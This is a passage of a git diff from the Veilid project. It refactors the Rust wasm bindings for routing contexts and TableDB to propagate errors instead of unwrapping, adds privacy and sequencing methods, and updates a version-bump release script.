/// * `call_id` - specifies which call to reply to, and it comes from a VeilidUpdate::AppCall, specifically the VeilidAppCall::id() value.
|
||||
/// * `message` - is an answer blob to be returned by the remote node's RoutingContext::app_call() function, and may be up to 32768 bytes
|
||||
pub async fn appCallReply(call_id: String, message: String) -> APIResult<()> {
|
||||
let message = unmarshall(message);
|
||||
let message = unmarshall(message)?;
|
||||
let call_id = match call_id.parse() {
|
||||
Ok(v) => v,
|
||||
Err(e) => {
|
||||
@ -139,10 +102,43 @@ impl VeilidRoutingContext {
|
||||
// Instance methods
|
||||
// --------------------------------
|
||||
fn getRoutingContext(&self) -> APIResult<RoutingContext> {
|
||||
let Some(routing_context) = &self.inner_routing_context else {
|
||||
return APIResult::Err(veilid_core::VeilidAPIError::generic("Unable to getRoutingContext instance. inner_routing_context is None."));
|
||||
};
|
||||
APIResult::Ok(routing_context.clone())
|
||||
APIResult::Ok(self.inner_routing_context.clone())
|
||||
}
|
||||
|
||||
/// Turn on sender privacy, enabling the use of safety routes.
|
||||
/// Returns a new instance of VeilidRoutingContext - does not mutate.
|
||||
///
|
||||
/// Default values for hop count, stability and sequencing preferences are used.
|
||||
///
|
||||
/// Hop count default is dependent on config, but is set to 1 extra hop.
|
||||
/// Stability default is to choose 'low latency' routes, preferring them over long-term reliability.
|
||||
/// Sequencing default is to have no preference for ordered vs unordered message delivery
|
||||
pub fn withPrivacy(&self) -> APIResult<VeilidRoutingContext> {
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
APIResult::Ok(VeilidRoutingContext {
|
||||
inner_routing_context: routing_context.with_privacy()?,
|
||||
})
|
||||
}
|
||||
|
||||
/// Turn on privacy using a custom `SafetySelection`.
|
||||
/// Returns a new instance of VeilidRoutingContext - does not mutate.
|
||||
pub fn withCustomPrivacy(
|
||||
&self,
|
||||
safety_selection: SafetySelection,
|
||||
) -> APIResult<VeilidRoutingContext> {
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
APIResult::Ok(VeilidRoutingContext {
|
||||
inner_routing_context: routing_context.with_custom_privacy(safety_selection)?,
|
||||
})
|
||||
}
|
||||
|
||||
/// Use a specified `Sequencing` preference.
|
||||
/// Returns a new instance of VeilidRoutingContext - does not mutate.
|
||||
pub fn withSequencing(&self, sequencing: Sequencing) -> APIResult<VeilidRoutingContext> {
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
APIResult::Ok(VeilidRoutingContext {
|
||||
inner_routing_context: routing_context.with_sequencing(sequencing),
|
||||
})
|
||||
}
|
||||
|
||||
/// App-level unidirectional message that does not expect any value to be returned.
|
||||
@ -154,7 +150,7 @@ impl VeilidRoutingContext {
|
||||
#[wasm_bindgen(skip_jsdoc)]
|
||||
pub async fn appMessage(&self, target_string: String, message: String) -> APIResult<()> {
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
let message = unmarshall(message);
|
||||
let message = unmarshall(message)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let target = veilid_api.parse_as_target(target_string).await?;
|
||||
@ -171,7 +167,7 @@ impl VeilidRoutingContext {
|
||||
/// @returns an answer blob of up to `32768` bytes, base64Url encoded.
|
||||
#[wasm_bindgen(skip_jsdoc)]
|
||||
pub async fn appCall(&self, target_string: String, request: String) -> APIResult<String> {
|
||||
let request: Vec<u8> = unmarshall(request);
|
||||
let request: Vec<u8> = unmarshall(request)?;
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
@ -217,11 +213,10 @@ impl VeilidRoutingContext {
|
||||
key: String,
|
||||
writer: Option<String>,
|
||||
) -> APIResult<DHTRecordDescriptor> {
|
||||
let key = TypedKey::from_str(&key).unwrap();
|
||||
let writer = match writer {
|
||||
Some(writer) => Some(KeyPair::from_str(&writer).unwrap()),
|
||||
_ => None,
|
||||
};
|
||||
let key = TypedKey::from_str(&key)?;
|
||||
let writer = writer
|
||||
.map(|writer| KeyPair::from_str(&writer))
|
||||
.map_or(APIResult::Ok(None), |r| r.map(Some))?;
|
||||
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
let dht_record_descriptor = routing_context.open_dht_record(key, writer).await?;
|
||||
@ -232,7 +227,7 @@ impl VeilidRoutingContext {
|
||||
///
|
||||
/// Closing a record allows you to re-open it with a different routing context
|
||||
pub async fn closeDhtRecord(&self, key: String) -> APIResult<()> {
|
||||
let key = TypedKey::from_str(&key).unwrap();
|
||||
let key = TypedKey::from_str(&key)?;
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
routing_context.close_dht_record(key).await?;
|
||||
APIRESULT_UNDEFINED
|
||||
@ -244,7 +239,7 @@ impl VeilidRoutingContext {
|
||||
/// Deleting a record does not delete it from the network, but will remove the storage of the record locally,
|
||||
/// and will prevent its value from being refreshed on the network by this node.
|
||||
pub async fn deleteDhtRecord(&self, key: String) -> APIResult<()> {
|
||||
let key = TypedKey::from_str(&key).unwrap();
|
||||
let key = TypedKey::from_str(&key)?;
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
routing_context.delete_dht_record(key).await?;
|
||||
APIRESULT_UNDEFINED
|
||||
@ -262,7 +257,7 @@ impl VeilidRoutingContext {
|
||||
subKey: u32,
|
||||
forceRefresh: bool,
|
||||
) -> APIResult<Option<ValueData>> {
|
||||
let key = TypedKey::from_str(&key).unwrap();
|
||||
let key = TypedKey::from_str(&key)?;
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
let res = routing_context
|
||||
.get_dht_value(key, subKey, forceRefresh)
|
||||
@ -280,10 +275,8 @@ impl VeilidRoutingContext {
|
||||
subKey: u32,
|
||||
data: String,
|
||||
) -> APIResult<Option<ValueData>> {
|
||||
let key = TypedKey::from_str(&key).unwrap();
|
||||
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(&data.as_bytes())
|
||||
.unwrap();
|
||||
let key = TypedKey::from_str(&key)?;
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let routing_context = self.getRoutingContext()?;
|
||||
let res = routing_context.set_dht_value(key, subKey, data).await?;
|
||||
|
@ -63,11 +63,11 @@ impl VeilidTableDB {
|
||||
/// Read a key from a column in the TableDB immediately.
|
||||
pub async fn load(&mut self, columnId: u32, key: String) -> APIResult<Option<String>> {
|
||||
self.ensureOpen().await;
|
||||
let key = unmarshall(key);
|
||||
let key = unmarshall(key)?;
|
||||
let table_db = self.getTableDB()?;
|
||||
|
||||
let out = table_db.load(columnId, &key).await?.unwrap();
|
||||
let out = Some(marshall(&out));
|
||||
let out = table_db.load(columnId, &key).await?;
|
||||
let out = out.map(|out| marshall(&out));
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
@ -75,8 +75,8 @@ impl VeilidTableDB {
|
||||
/// Performs a single transaction immediately.
|
||||
pub async fn store(&mut self, columnId: u32, key: String, value: String) -> APIResult<()> {
|
||||
self.ensureOpen().await;
|
||||
let key = unmarshall(key);
|
||||
let value = unmarshall(value);
|
||||
let key = unmarshall(key)?;
|
||||
let value = unmarshall(value)?;
|
||||
let table_db = self.getTableDB()?;
|
||||
|
||||
table_db.store(columnId, &key, &value).await?;
|
||||
@ -86,11 +86,11 @@ impl VeilidTableDB {
|
||||
/// Delete key with from a column in the TableDB.
|
||||
pub async fn delete(&mut self, columnId: u32, key: String) -> APIResult<Option<String>> {
|
||||
self.ensureOpen().await;
|
||||
let key = unmarshall(key);
|
||||
let key = unmarshall(key)?;
|
||||
let table_db = self.getTableDB()?;
|
||||
|
||||
let out = table_db.delete(columnId, &key).await?.unwrap();
|
||||
let out = Some(marshall(&out));
|
||||
let out = table_db.delete(columnId, &key).await?;
|
||||
let out = out.map(|out| marshall(&out));
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
@ -161,15 +161,15 @@ impl VeilidTableDBTransaction {
|
||||
/// Store a key with a value in a column in the TableDB.
|
||||
/// Does not modify TableDB until `.commit()` is called.
|
||||
pub fn store(&self, col: u32, key: String, value: String) -> APIResult<()> {
|
||||
let key = unmarshall(key);
|
||||
let value = unmarshall(value);
|
||||
let key = unmarshall(key)?;
|
||||
let value = unmarshall(value)?;
|
||||
let transaction = self.getTransaction()?;
|
||||
transaction.store(col, &key, &value)
|
||||
}
|
||||
|
||||
/// Delete key with from a column in the TableDB
|
||||
pub fn deleteKey(&self, col: u32, key: String) -> APIResult<()> {
|
||||
let key = unmarshall(key);
|
||||
let key = unmarshall(key)?;
|
||||
let transaction = self.getTransaction()?;
|
||||
transaction.delete(col, &key)
|
||||
}
|
||||
|
@ -36,3 +36,13 @@ pub(crate) fn into_unchecked_string_array(items: Vec<String>) -> StringArray {
|
||||
.collect::<js_sys::Array>()
|
||||
.unchecked_into::<StringArray>() // TODO: can I do this a better way?
|
||||
}
|
||||
|
||||
/// Convert a StringArray (`js_sys::Array` with the type of `string[]`) into `Vec<String>`
|
||||
pub(crate) fn into_unchecked_string_vec(items: StringArray) -> Vec<String> {
|
||||
items
|
||||
.unchecked_into::<js_sys::Array>()
|
||||
.to_vec()
|
||||
.into_iter()
|
||||
.map(|i| serde_wasm_bindgen::from_value(i).unwrap())
|
||||
.collect::<Vec<String>>()
|
||||
}
|
||||
|
@ -1,4 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Fail out if any step has an error
|
||||
set -e
|
||||
|
||||
if [ "$1" == "patch" ]; then
|
||||
@ -15,5 +17,15 @@ else
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Change version of crates and packages everywhere
|
||||
bumpversion $PART
|
||||
|
||||
# Get the new version we bumped to
|
||||
NEW_VERSION=$(cat .bumpversion.cfg | grep current_version\ = | cut -d\ -f3)
|
||||
echo NEW_VERSION=$NEW_VERSION
|
||||
|
||||
# Update crate dependencies for the crates we publish
|
||||
cargo upgrade -p veilid-tools@$NEW_VERSION -p veilid-core@$NEW_VERSION
|
||||
|
||||
# Update lockfile
|
||||
cargo update
|
Loading…
Reference in New Issue
Block a user